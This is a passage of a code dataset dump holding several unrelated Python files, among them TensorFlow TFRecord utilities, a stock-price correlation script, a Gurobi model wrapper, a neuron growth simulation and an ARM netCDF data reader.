'+img_path)\n\nhist(rndn(10000))\nspause()\nraw_enter();CA()\n\nxy = rndn(1000,2)\npts_plot(xy)\nplt_square()\nspause()\nraw_enter();CA()\n#,a\nprint('cv2 test')\nfor k in range(3):\n\tprint(k)\n\tfor i in range(0,100,1):\n\t\tm = z55(rndn(100,100,3))\n\t\tm = m // 2\n\t\tm[i,:,:] = (255,0,0)\n\t\tj = (k+1)*i\n\t\twhile j >= 100:\n\t\t\tj = j - 99\n\t\tm[:,j,:] = (0,255,0)\n\t\t#m[i,i,:] = 255\n\t\td = 1000//30\n\t\t#if i == 50:\n\t\t#\td = 1000\n\t\tmci(m,delay=d,scale=4,)\n\t\t#time.sleep(1/15)\n\nraw_enter()\nCA()\n#,b\n\n#EOF\n\n","sub_path":"misc/basic_graphics_test.py","file_name":"basic_graphics_test.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"653282828","text":"\"\"\" Data Utils\n\nReference:\nhttps://github.com/changjo/stanford-tensorflow-tutorials/blob/master/examples/09_tfrecord_example.py\nhttps://github.com/balancap/SSD-Tensorflow/blob/master/datasets/pascalvoc_to_tfrecords.py\n\"\"\"\n\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport scipy.misc\nimport matplotlib.pyplot as plt\nimport random\nimport os, sys\n\nDIRECTORY_IMAGES = 'images/'\nDIRECTORY_LABELS = 'labels/'\n\n# TFRecords 변환 파라미터.\nRANDOM_SEED = 4242\nSAMPLES_PER_FILE = 200\nCOLOR_CHANNELS = 3\nIN_SIZE = 224\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef get_image(filename):\n image = Image.open(filename)\n image = np.asarray(image, np.uint8)\n shape = np.array(image.shape, np.int32)\n height, width, depth = shape[0], shape[1], shape[2]\n shape = (height, width, depth)\n\n return image, shape\n\n\ndef get_label_int(filename):\n if not os.path.isfile(filename):\n return -1\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n if len(line) != 0:\n label = int(line)\n return label\n\n\ndef _convert_to_example(label, shape, binary_image):\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image': _bytes_feature(binary_image),\n 'label': _int64_feature(label),\n 'height': _int64_feature(shape[0]),\n 'width': _int64_feature(shape[1]),\n 'depth': _int64_feature(shape[2])\n }))\n return example\n\n\ndef _add_to_tfrecord(dataset_dir, filename, tfrecord_writer):\n name, ext = os.path.splitext(filename)\n image_file = os.path.join(dataset_dir, DIRECTORY_IMAGES, name + ext)\n image, shape = get_image(image_file)\n image = scipy.misc.imresize(image, (IN_SIZE, IN_SIZE))\n binary_image = image.tobytes()\n\n label_file = os.path.join(dataset_dir, DIRECTORY_LABELS, name + '.txt')\n label = get_label_int(label_file)\n\n example = _convert_to_example(label, shape, binary_image)\n tfrecord_writer.write(example.SerializeToString())\n\n\ndef _get_output_filename(output_dir, name, idx):\n return '%s/%s_%03d.tfrecord' % (output_dir, name, idx)\n\n\ndef convert_to_tfrecord(dataset_dir, output_dir, name=\"output\", shuffling=False):\n if not tf.gfile.Exists(output_dir):\n tf.gfile.MakeDirs(output_dir)\n\n path = os.path.join(dataset_dir, DIRECTORY_LABELS)\n filenames = sorted(os.listdir(path))\n if shuffling:\n random.seed(RANDOM_SEED)\n random.shuffle(filenames)\n\n # Process dataset files.\n i = 0\n tfrecord_idx = 0\n while i < len(filenames):\n tfrecord_file = _get_output_filename(output_dir, name, tfrecord_idx)\n with tf.python_io.TFRecordWriter(tfrecord_file) as writer:\n j = 0\n while j < SAMPLES_PER_FILE and i < len(filenames):\n sys.stdout.write('\\r>> Converting image %d/%d' % (i + 1, len(filenames)))\n\n filename = filenames[i]\n _add_to_tfrecord(dataset_dir, filename, writer)\n\n i += 1\n j += 1\n tfrecord_idx += 1\n\n\ndef read_from_tfrecord(filenames):\n tfrecord_file_queue = tf.train.string_input_producer(filenames, name='queue')\n reader = tf.TFRecordReader()\n _, tfrecord_serialized = reader.read(tfrecord_file_queue)\n tfrecord_features = tf.parse_single_example(tfrecord_serialized,\n features={\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'depth': tf.FixedLenFeature([], tf.int64)\n }, name='features')\n\n image = tf.decode_raw(tfrecord_features['image'], tf.uint8)\n label = tf.cast(tfrecord_features['label'], tf.int32)\n height = tf.cast(tfrecord_features['height'], tf.int32)\n width = tf.cast(tfrecord_features['width'], tf.int32)\n depth = tf.cast(tfrecord_features['depth'], tf.int32)\n # the image tensor is flatterned out, so we have to reconstruct the shape.\n image = tf.reshape(image, [height, width, depth])\n\n return image, label, height, width, depth\n\n\ndef read_and_decode(tfrecord_file_queue):\n reader = tf.TFRecordReader()\n _, tfrecord_serialized = reader.read(tfrecord_file_queue)\n tfrecord_features = tf.parse_single_example(tfrecord_serialized,\n features={\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'depth': tf.FixedLenFeature([], tf.int64)\n }, name='features')\n\n image = tf.decode_raw(tfrecord_features['image'], tf.uint8)\n label = tf.cast(tfrecord_features['label'], tf.int32)\n height = tf.cast(tfrecord_features['height'], tf.int32)\n width = tf.cast(tfrecord_features['width'], tf.int32)\n depth = tf.cast(tfrecord_features['depth'], tf.int32)\n # the image tensor is flatterned out, so we have to reconstruct the shape.\n image = tf.cast(image, tf.float32) * (1. / 255)\n shape = [height, width, COLOR_CHANNELS]\n image = tf.reshape(image, shape)\n\n return image, label, shape\n\n\ndef read_tfrecord(tfrecord_file):\n image, label, height, width, depth = read_from_tfrecord([tfrecord_file])\n with tf.Session() as sess:\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n # label, image, shape = sess.run([label, image, shape])\n im, la, h, w, d = sess.run([image, label, height, width, depth])\n coord.request_stop()\n coord.join(threads)\n\n print(la)\n print(im)\n print(h, w, d)\n plt.imshow(im)\n plt.show()\n\n\n# From \"https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/how_tos/reading_data/fully_connected_reader.py\"\ndef inputs_old(filename, batch_size, num_epochs):\n \"\"\"Reads input data num_epochs times.\n Args:\n train: Selects between the training (True) and validation (False) data.\n batch_size: Number of examples per returned batch.\n num_epochs: Number of times to read the input data, or 0/None to\n train forever.\n Returns:\n A tuple (images, labels), where:\n * images is a float tensor with shape [batch_size, mnist.IMAGE_PIXELS]\n in the range [-0.5, 0.5].\n * labels is an int32 tensor with shape [batch_size] with the true label,\n a number in the range [0, mnist.NUM_CLASSES).\n Note that an tf.train.QueueRunner is added to the graph, which\n must be run using e.g. tf.train.start_queue_runners().\n \"\"\"\n if not num_epochs: num_epochs = None\n\n with tf.name_scope('input'):\n tfrecord_file_queue = tf.train.string_input_producer([filename], num_epochs=num_epochs, name='queue')\n\n # Even when reading in multiple threads, share the filename\n # queue.\n image, label, shape = read_and_decode(tfrecord_file_queue)\n # Shuffle the examples and collect them into batch_size batches.\n # (Internally uses a RandomShuffleQueue.)\n # We run this in two threads to avoid being a bottleneck.\n # images, sparse_labels = tf.train.shuffle_batch(\n # [image, label], batch_size=batch_size, num_threads=2,\n # capacity=1000 + 3 * batch_size, min_after_dequeue=1000)\n image = image_preprocess(image)\n # image = tf.image.resize_images(image, [googlenet.IN_SIZE, googlenet.IN_SIZE])\n # image = tf.random_crop(image, [googlenet.IN_SIZE, googlenet.IN_SIZE, 3])\n\n # Flatten an image.\n #image = tf.reshape(image, [googlenet.IN_SIZE, googlenet.IN_SIZE, COLOR_CHANNELS])\n images, sparse_labels = tf.train.batch([image, label], batch_size=batch_size, num_threads=2,\n capacity=1000 + 3 * batch_size)\n\n return images, sparse_labels\n\n\ndef inputs(filenames, batch_size, num_epochs):\n\n dataset = tf.data.TFRecordDataset(filenames)\n\n def parser(record):\n keys_to_features = {'image': tf.FixedLenFeature((), tf.string),\n 'label': tf.FixedLenFeature((), tf.int64),\n 'height': tf.FixedLenFeature((), tf.int64),\n 'width': tf.FixedLenFeature((), tf.int64),\n 'depth': tf.FixedLenFeature((), tf.int64)\n }\n parsed = tf.parse_single_example(record, keys_to_features)\n image = tf.decode_raw(parsed['image'], tf.uint8)\n image = tf.cast(image, tf.float32) * (1. / 255)\n height = tf.cast(parsed['height'], tf.int32)\n width = tf.cast(parsed['width'], tf.int32)\n depth = tf.cast(parsed['depth'], tf.int32)\n image = tf.reshape(image, [IN_SIZE, IN_SIZE, COLOR_CHANNELS])\n\n #image = image_preprocess(image)\n label = tf.cast(parsed['label'], tf.int32)\n\n return image, label\n\n dataset = dataset.map(parser)\n dataset = dataset.shuffle(buffer_size=10000)\n dataset = dataset.batch(batch_size)\n dataset = dataset.repeat(num_epochs)\n iterator = dataset.make_one_shot_iterator()\n\n images, labels = iterator.get_next()\n\n return images, labels\n\n\ndef image_preprocess(images):\n images = tf.image.resize_images(images, [IN_SIZE, IN_SIZE])\n return images\n\n\ndef main():\n dataset_dir = 'data/'\n output_dir = './tfrecords'\n name = 'our'\n # convert_to_tfrecord(dataset_dir=dataset_dir, output_dir=output_dir, name=name, shuffling=False)\n tfrecord_file = os.path.join(output_dir, name + '_000.tfrecord')\n # read_tfrecord(tfrecord_file)\n images, labels = inputs([tfrecord_file], batch_size=2, num_epochs=None)\n\n with tf.Session() as sess:\n im, la = sess.run([images, labels])\n\n print(la[0])\n print(im[0])\n plt.imshow(im[0])\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"people_classification/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101317990","text":"import pandas as pd\nimport datetime\nimport matplotlib.pyplot as plt \nimport numpy as np\nfrom pandas_datareader import data, wb\nfrom sklearn import datasets, linear_model\n#import statsmodels.formula.api as sm\n#from pandas.io import wb\n#import pandas.io.data as web \n#from pandas_datareader import data as web\n\napple = pd.DataFrame.from_csv(\"apple.csv\")\nmicrosoft = pd.DataFrame.from_csv(\"microsoft.csv\")\n\nprint(apple.head())\nprint(microsoft.head())\n\n#Printing pure data\napp = apple[\"Adj Close\"].values\nmic = microsoft[\"Adj Close\"].values\nprint(\"Pure data series\")\nprint(app)\nprint(mic)\n\n#number of datapoints\nn = microsoft[\"Adj Close\"].values.shape[0]\n\nEapp = app.sum()/n\nEmic = mic.sum()/n\n\nprint(\"Average prices\")\nprint(\"Apple\")\nprint(Eapp)\nprint(\"Microsoft\")\nprint(Emic)\n\n#Standard deviation and variance\nvarappl = 0\nfor i in range(n):\n\tvarappl += (app[i]-Eapp)**2/n\nstdappl = np.sqrt(varappl)\n\nvarmic = 0\nfor i in range(n):\n\tvarmic += (mic[i]-Emic)**2/n\nstdmic = np.sqrt(varmic)\n\n\nprint(\"standard deviation apple = {}\".format(stdappl))\nprint(\"standard deviation microsoft = {}\".format(stdmic))\n\n#Covariance and correlation\nCov = 0\nfor i in range(n):\n\tCov += (app[i]-Eapp)*(mic[i]-Emic)/n\nprint(\"Covariance = {0}\".format(Cov))\nprint(\"Correlation = {}\".format(Cov/(stdmic*stdappl)))\n\n\n\n# plt.figure(0)\n# plt.hold(True)\n# apple[\"Adj Close\"].plot(grid = True)\n# microsoft[\"Adj Close\"].plot(grid = True)\n# plt.ylabel('Adjusted closing Price $')\n# plt.legend(['Apple','Microsoft'],loc='upper center', ncol=2,bbox_to_anchor=(0.5,1.1))\n# plt.show()\n\n\n#lienar regression\n#sklearn needs a shape (n,1) and not (n,) which is usual... so we need to reshape\nxdata = np.linspace(0,n,n)\nxdata = xdata.reshape((n,1))\napp = app.reshape((n,1))\nmic = mic.reshape((n,1))\n\nregr = linear_model.LinearRegression()\nregr.fit(xdata, app)\n\nregr2 = linear_model.LinearRegression()\nregr2.fit(xdata, mic)\n\n\nfig = plt.figure(1)\nplt.hold(True)\nline1, = plt.plot(xdata,app,color='blue')\nplt.plot(xdata, regr.predict(xdata), color='blue', linewidth=3)\nline2, = plt.plot(xdata,mic,color='green')\nplt.plot(xdata, regr2.predict(xdata), color='green', linewidth=3)\nplt.ylabel('Adjusted closing Price $')\nplt.title('Corr={0}'.format(Cov/(stdmic*stdappl)))\nplt.legend([line1,line2],['Apple','Microsoft'])\nplt.xlabel('x [time]')\nplt.show()\n\nfig.savefig('linreg.png', bbox_inches='tight')","sub_path":"stockplot.py","file_name":"stockplot.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"63662813","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 27 16:05:15 2015\n\n@author: paulsalessi\n\"\"\"\n\nimport pandas as pd\nimport json\n\nSTUDENT_DATA = \"data_files/mapped_student_data.csv\"\n\nstudents = pd.read_csv(STUDENT_DATA, sep=\"\\t\")\n\ncity_data = dict(students.City.value_counts())\n\njson_obj = []\n\nfor city in city_data.keys():\n city_long = list(students[students[\"City\"] == city][\"Longitude\"])[0]\n city_lat = list(students[students[\"City\"] == city][\"Latitude\"])[0]\n\n city_count = city_data[city]\n \n json_obj.append({\"coordinates\":[city_lat,city_long], \"count\":city_count, \"name\":city})\n\nwith open(\"data_files/city_data.json\",\"w\") as json_data: \n json_data.write(json.dumps(json_obj))\n","sub_path":"source/get_city_json.py","file_name":"get_city_json.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425628185","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag(name=\"yimi\")\ndef my_sum(arg1, arg2, arg3):\n return \"{} {} {}\".format(arg1, arg2, arg3)\n\n\n@register.inclusion_tag('results.html')\ndef show_results(n):\n n = 1 if n < 1 else int(n)\n data = [\"第{}项\".format(i) for i in range(1, n+1)]\n return {\"results\": data}\n","sub_path":"Django/进阶部分/day67/day67课上代码两个项目哦/day65/mysiteday65/app01/templatetags/mysimpletag.py","file_name":"mysimpletag.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"390753458","text":"#! /usr/bin/python\n\n# Copyright (c) 2019 Filippo Ranza \n\nimport os\n\n\ntry:\n import gurobipy\nexcept ImportError:\n # for test purposes\n pass\n\nfrom .solution import Solution, DebugData, get_solution_file_name\nfrom .config_loader import DEFAULT_CONF\n\nGUROBI_PARAMS = {\n \"TIME_LIMIT\": \"TimeLimit\",\n \"NUM_THREAD\": \"Threads\",\n \"MIP_GAP\": \"MIPGap\",\n}\n\n\ndef create_env(config, one_solution):\n env = gurobipy.Env()\n if not config[\"LOG\"]:\n env.setParam(\"OutputFlag\", 0)\n\n for k, v in GUROBI_PARAMS.items():\n def_val = DEFAULT_CONF[k]\n conf = config[k]\n if conf != def_val: \n env.setParam(v, conf)\n\n if one_solution:\n env.setParam(\"SolutionLimit\", 1)\n\n return env\n\n\nclass Model:\n def __init__(self, mps_file, config, linear_relax=False, one_solution=False):\n\n self.preload = config[\"PRELOAD\"]\n self.sol_file = get_solution_file_name(config.get(\"SOLUTION_FILE\"))\n self.model = gurobipy.read(mps_file, env=create_env(config, one_solution))\n self.relax = linear_relax\n self.stat = None\n if linear_relax:\n self.model = self.model.relax()\n\n\n def preload_from_file(self):\n if self.sol_file and os.path.isfile(self.sol_file):\n self.model.read(self.sol_file)\n\n\n def preload_solution(self, sol=None):\n if not self.preload or sol is None:\n return\n\n for name, value in sol.vars.items():\n self.model.getVarByName(name).start = value\n\n def run(self):\n self.model.optimize()\n stat = self.model.status\n self.stat = stat\n return stat == gurobipy.GRB.status.OPTIMAL\n\n def disable_variables(self, base_kernel, value=0):\n for name, _ in filter(lambda x: not x[1], base_kernel.items()):\n var = self.model.getVarByName(name)\n self.model.addConstr(var == value)\n\n def add_bucket_contraints(self, solution, bucket):\n self.model.addConstr(\n gurobipy.quicksum(self.model.getVarByName(var) for var in bucket) >= 1\n )\n if solution:\n self.model.setParam(\"Cutoff\", solution.value)\n\n def build_solution(self, prev_sol=None):\n gen = ((var.varName, var.x) for var in self.model.getVars())\n if prev_sol:\n prev_sol.update(self.model.objVal, gen)\n else:\n prev_sol = Solution(self.model.objVal, gen)\n\n return prev_sol\n\n def get_base_variables(self, null_value=0.0):\n gen = ((var.varName, var.x != null_value) for var in self.model.getVars())\n return dict(gen)\n\n def build_lp_solution(self, null_value=0.0):\n gen = self._lp_sol_generator(null_value)\n return Solution(self.model.objVal, gen)\n\n def _lp_sol_generator(self, null_value):\n for var in self.model.getVars():\n if var.x == null_value:\n yield var.varName, var.rc\n else:\n yield var.varName, var.x\n\n def build_debug(self, kernel_size, bucket_size):\n return DebugData(\n value=self.model.objVal,\n time=self.model.getAttr(\"Runtime\"),\n nodes=self.model.getAttr(\"NodeCount\"),\n kernel_size=kernel_size,\n bucket_size=bucket_size,\n )\n\n def model_size(self):\n tmp = self.model.getVars()\n return len(tmp)\n\n def reach_solution_limit(self):\n return self.stat == gurobipy.GRB.status.SOLUTION_LIMIT\n\n def reach_time_limit(self):\n return self.stat == gurobipy.GRB.status.TIME_LIMIT\n","sub_path":"ks_engine/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249595937","text":"#!/bin/python\r\n\r\n#import matplotlib\r\n#matplotlib.use('TkAgg')\r\n#export DISPLAY=:0.0\r\nimport matplotlib.image as img\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport numpy as np\r\n#import pylab\r\nimport itertools\r\nimport time\r\n#import inspect\r\n\r\n#create a test class for neuron\r\nclass neuron:\r\n # init method creates the basic neuron attributes from the attribs list\r\n def __init__(self, cfgNeuron):\r\n self.name = cfgNeuron[0]\r\n self.size = cfgNeuron[1]\r\n self.nodeArray = np.zeros([1,3])\r\n self.nodeList = []\r\n self.branchList = []\r\n \r\n # make an array containing all the voxels that are within the soma\r\n #this is super slow\r\n# def getSomaArray(self):\r\n# self.somaVoxArray = np.fromiter(itertools.chain(*itertools.product(range(self.size),repeat=3)), dtype=int).reshape(-1,3)\r\n# self.nodeArray=np.append(self.nodeArray,self.somaVoxArray,axis=0)\r\n# \r\n #make a LIST with the voxels\r\n #this is way faster \r\n #Not a real list. It's a list of tuples. Might have to change that later\r\n def getSomaList(self):\r\n self.somaVoxList = list(itertools.product(range(self.size),repeat=2))\r\n self.nodeList.extend(self.somaVoxList)\r\n #test functions; not functional. I guess it grows all branches\r\n def growNeuron(self):\r\n self.isGrowing=1\r\n self.isResting=0\r\n for curb in self.__dict__.items():\r\n if curb[:2]=='bi':\r\n print(curb)\r\n self.curb.growBranch()\r\n def restNeuron(self):\r\n self.isResting=1\r\n self.isGrowing=0\r\n def updateNeuron(self):\r\n #update the neuron voxlist so it includes the branches\r\n print(\"updating neuron\")\r\n for branch,nodeList in self.__dict__.items():\r\n if branch[:2]=='bi':\r\n self.nodeList.extend(nodeList.nodeList)\r\n \r\n \r\n \r\n #For now, I'm going to define the neurite class within the neuron class\r\n class branch:\r\n def __init__(self, cfgBranch):\r\n self.name = cfgBranch[0]\r\n self.root = cfgBranch[1]\r\n self.growthRate = cfgBranch[2]\r\n self.tortuosity = cfgBranch[3]\r\n self.direction = [0,1]\r\n self.tip = self.root\r\n self.nodeList = []\r\n def growBranch(self):\r\n self.tip=[sum(x) for x in zip(self.tip,self.direction)]\r\n #I think that I want extend.\r\n self.nodeList.append(tuple(self.tip))\r\n self.isGrowing=1\r\n self.isResting=0\r\n def restBranch(self):\r\n self.isResting=1\r\n self.isGrowing=0\r\n \r\n\r\n#Time to initialize is essentially zero. Probably because we haven't made anything\r\nstartNeurGen=time.time()\r\nstartAttribs=(\"steve\",10)\r\nneur1 = neuron(startAttribs)\r\nneur1.bi1 = neur1.branch([\"steveBranch1\",[11,11], 1, 1])\r\nneur1.bi2 = neur1.branch([\"steveBranch2\",[1,11], 1, 1])\r\n#neur1.branchList.append(\"branchInst1\")\r\n#neur1.branchList.append(\"branchInst2\")\r\nfinishNeurGen=time.time()\r\nprint('neurGenTime=',finishNeurGen-startNeurGen)\r\n\r\n\r\n#The array method is super slow.\r\n#startArray=time.time()\r\n#neur1.getSomaArray()\r\n#finishArray=time.time()\r\n#print('arrayTime=',finishArray-startArray)\r\n\r\n#Manipulation of the list appears to be 5x-10x faster than then array\r\n#I can also probably remove things faster there.\r\nstartList=time.time()\r\nneur1.getSomaList()\r\nfinishList=time.time()\r\nprint('listTime=',finishList-startList)\r\n\r\n#Plotting the array is way faster than plotting the list\r\n#def plotNeurArray(neur):\r\n# startPlotArray=time.time()\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='2d')\r\n# ax.scatter(neur.somaVoxArray[:,0],neur.somaVoxArray[:,1],neur.somaVoxArray[:,2])\r\n# finishPlotArray=time.time()\r\n# print('plotArray=',finishPlotArray-startPlotArray)\r\n\r\n#This is much slower than the array method. I will try it with a list->array step\r\n#def plotNeurList(neur):\r\n# startPlotList=time.time()\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='2d')\r\n# ax.scatter((zip(*neur.somaVoxList)[0]),(zip(*neur.somaVoxList)[1]),(zip(*neur.somaVoxList)[2]))\r\n# finishPlotList=time.time()\r\n# print('plotList=',finishPlotList-startPlotList)\r\n\r\n#This is seemingly the FASTEST, but that should be checked with scaling.\r\ndef plotNeurList2Array(neur):\r\n startPlotList2Array=time.time()\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n tempArray=np.array(neur.nodeList)\r\n ax.scatter(tempArray[:,0],tempArray[:,1])\r\n finishPlotList2Array=time.time()\r\n print(np.size(tempArray))\r\n print('plotList=',finishPlotList2Array-startPlotList2Array)\r\n\r\ninputFileName=\"ngSeed1.png\"\r\nrawArray = img.imread(inputFileName)\r\nplt.imshow(rawArray)\r\n\r\n#for x in range(20):\r\n# neur1.bi1.growBranch()\r\n# neur1.updateNeuron()\r\n# plotNeurList2Array(neur1)\r\n# print(x)\r\n\r\n#import code\r\n#code.interact(local=locals())\r\n\r\n\r\n\r\n######\r\n# Need to do some basic testing to find out if it is faster to put my overall\r\n# neuron voxel list in an array or in a list\r\n######\r\n","sub_path":"growTest_2d_img.py","file_name":"growTest_2d_img.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"603118735","text":"# THIS IS THE VARIABLE\ntotal = 0\naverage = 0\nnumberToAdd = 1\nenteredNumbersArray = []\n\nwhile numberToAdd != 0:\n # THIS IS WHERE THE USERS INPUT IT TAKEN IN.\n numberToAdd = int(input(\"Enter A Number To Add: \"))\n\n # THIS IS WHERE THE MATHMATICS IS DONE AND THINGS ARE ADDED TO ARRAY'S.\n enteredNumbersArray.append(numberToAdd)\n total = numberToAdd + total\n average = sum(enteredNumbersArray) / len(enteredNumbersArray)\n\n # THIS PRINT'S OUT THE TOTALS AND AVERAGES OF THE NUMBERS THAT HAVE BEEN ENTERED.\n print(\"|-- YOUR CURRENT TOTAL IS --|\")\n print(\"|--\", total)\n\n print(\"|-- YOUR CURRENT AVERAGE IS --|\")\n print(\"|--\", average)\n print(\" \")","sub_path":"3.6/3.6.py","file_name":"3.6.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"136244213","text":"from atmPy.data_archives.arm._netCDF import ArmDataset as _Dataset\nimport os as _os\nfrom atmPy.data_archives.arm import _tdmasize,_tdmaapssize,_tdmahyg,_aosacsm, _noaaaos, _1twr10xC1, _aipfitrh1ogrenC1\nimport pandas as _pd\nimport pylab as _plt\nimport warnings\nimport pdb as _pdb\n\narm_products = {'tdmasize': {'module': _tdmasize},\n 'tdmaapssize':{'module': _tdmaapssize},\n 'tdmahyg': {'module': _tdmahyg},\n 'aosacsm': {'module': _aosacsm},\n 'noaaaos': {'module': _noaaaos},\n '1twr10xC1': {'module': _1twr10xC1},\n 'aipfitrh1ogrenC1': {'module': _aipfitrh1ogrenC1}\n }\n\n\ndef check_availability(folder,\n data_product = None,\n site = 'sgp',\n time_window = ('1990-01-01','2030-01-01'),\n custom_product_keys = False,\n ignore_unknown = True,\n verbose = False):\n\n fname = _os.listdir(folder)\n index = _pd.date_range('1990-01-01','2030-01-01', freq = 'D')\n df = _pd.DataFrame(index = index)\n\n for f in fname:\n if verbose:\n print('\\n', f)\n\n # error handling: test for netCDF file format\n if _os.path.splitext(f)[-1] != '.cdf':\n txt = '\\t %s is not a netCDF file ... skipping'%f\n if verbose:\n print(txt)\n continue\n\n site_check = _is_site(f,site,verbose)\n if not site_check:\n continue\n\n date = _is_in_time_window(f,time_window,verbose)\n if not date:\n continue\n\n product_id = _is_in_product_keys(f, ignore_unknown, verbose, custom_product_keys = custom_product_keys)\n if not product_id:\n continue\n\n if not _is_desired_product(product_id,data_product,verbose):\n continue\n\n if product_id not in df.columns:\n df[product_id] = _pd.Series(1, index = [date])\n else:\n df[product_id][date] = 1\n\n df = df.sort(axis=1)\n\n for e,col in enumerate(df.columns):\n df[col].values[df[col].values == 1] = e+1\n\n\n f,a = _plt.subplots()\n for col in df.columns:\n a.plot(df.index,df[col], lw = 35, color = [0,0,1,0.3])\n\n a.set_ylim((0.1,df.shape[1] + 0.9))\n bla = range(1,df.shape[1]+1)\n a.yaxis.set_ticks(bla)\n a.yaxis.set_ticklabels(df.columns)\n\n f.autofmt_xdate()\n\n f.tight_layout()\n return df, a\n\n\ndef read_cdf(fname,\n site = 'sgp',\n data_product = None,\n time_window = None,\n data_quality = 'good',\n data_quality_flag_max = None,\n concat = True,\n ignore_unknown = False,\n leave_cdf_open = False,\n verbose = True,\n ):\n \"\"\"\n Reads ARM NetCDF file(s) and returns a containers with the results.\n\n Parameters\n ----------\n fname: str or list of str.\n Either a file, directory, or list of files. If directory name is given\n all files in the directory will be considered.\n data_product: str.\n To see a list of allowed products look at the variable arm_products.\n time_window: tuple of str.\n e.g. ('2016-01-25 15:22:40','2016-01-29 15:00:00').\n Currently the entire day is considered, no need to use exact times.\n concat\n ignore_unknown\n verbose\n\n Returns\n -------\n\n \"\"\"\n\n # list or single file\n if type(fname) == str:\n if fname[-1] == '/':\n f = _os.listdir(fname)\n fname = [fname + i for i in f]\n else:\n fname = [fname]\n\n if len(fname) > 1 and leave_cdf_open:\n txt = \"leave_cdf_open can only be true if the number of files is one ... leave_cdf_open = False\"\n warnings.warn(txt)\n leave_cdf_open = False\n\n if type(data_product) == str:\n data_product = [data_product]\n products = {}\n\n #loop thru files\n for f in fname:\n if verbose:\n print('\\n', f)\n\n # error handling: test for netCDF file format\n # _pdb.set_trace()\n if _os.path.splitext(f)[-1] != '.cdf':\n txt = '\\t %s is not a netCDF file ... skipping'%f\n if verbose:\n print(txt)\n continue\n\n if not _is_in_time_window(f,time_window,verbose):\n continue\n\n product_id = _is_in_product_keys(f, ignore_unknown, verbose)\n if not product_id:\n continue\n\n site_check = _is_site(f,site,verbose)\n if not site_check:\n continue\n\n if not _is_desired_product(product_id,data_product,verbose):\n continue\n\n if product_id not in products.keys():\n products[product_id] = []\n\n\n arm_file_object = arm_products[product_id]['module'].ArmDatasetSub(f, data_quality = data_quality, data_quality_flag_max = data_quality_flag_max)\n\n if not leave_cdf_open:\n arm_file_object._close()\n\n products[product_id].append(arm_file_object)\n\n if len(fname) == 1:\n return arm_file_object\n\n else:\n if concat:\n for pf in products.keys():\n products[pf] = arm_products[pf]['module']._concat_rules(products[pf])\n return products\n\n\ndef _is_desired_product(product_id, data_product, verbose):\n out = True\n if data_product:\n if product_id not in data_product:\n if verbose:\n print('Not the desired data product ... skip')\n out = False\n return out\n\ndef _is_site(f,site,verbose):\n out = True\n fnt = _os.path.split(f)[-1].split('.')[0]\n site_is = fnt[:3]\n if site:\n if site_is != site:\n out = False\n if verbose:\n txt = 'Has wrong site_id (%s) ... skip!'%(site_is)\n print(txt)\n return out\n\ndef _is_in_product_keys(f, ignore_unknown,verbose, custom_product_keys = False):\n\n fnt = _os.path.split(f)[-1].split('.')\n product_id = False\n for prod in arm_products.keys():\n if prod in fnt[0]:\n product_id = prod\n break\n\n if custom_product_keys:\n for prod in custom_product_keys:\n if prod in fnt[0]:\n product_id = prod\n return product_id\n\n if not product_id:\n txt = '\\t has no ncattr named platform_id. Guess from file name failed ... skip'\n if verbose:\n print(txt)\n else:\n if product_id not in arm_products.keys():\n txt = 'Platform id %s is unknown.'%product_id\n product_id = False\n if ignore_unknown:\n if verbose:\n print(txt + '... skipping')\n else:\n raise KeyError(txt)\n return product_id\n\ndef _is_in_time_window(f,time_window, verbose):\n out = True\n if time_window:\n fnt = _os.path.split(f)[-1].split('.')\n ts = fnt[-3]\n file_start_data = _pd.to_datetime(ts)\n start_time = _pd.to_datetime(time_window[0])\n end_time = _pd.to_datetime(time_window[1])\n dt_start = file_start_data - start_time\n dt_end = file_start_data - end_time\n out = file_start_data\n\n if dt_start.total_seconds() < -86399:\n if verbose:\n print('outside (before) the time window ... skip')\n out = False\n elif dt_end.total_seconds() > 86399:\n if verbose:\n print('outside (after) the time window ... skip')\n out = False\n return 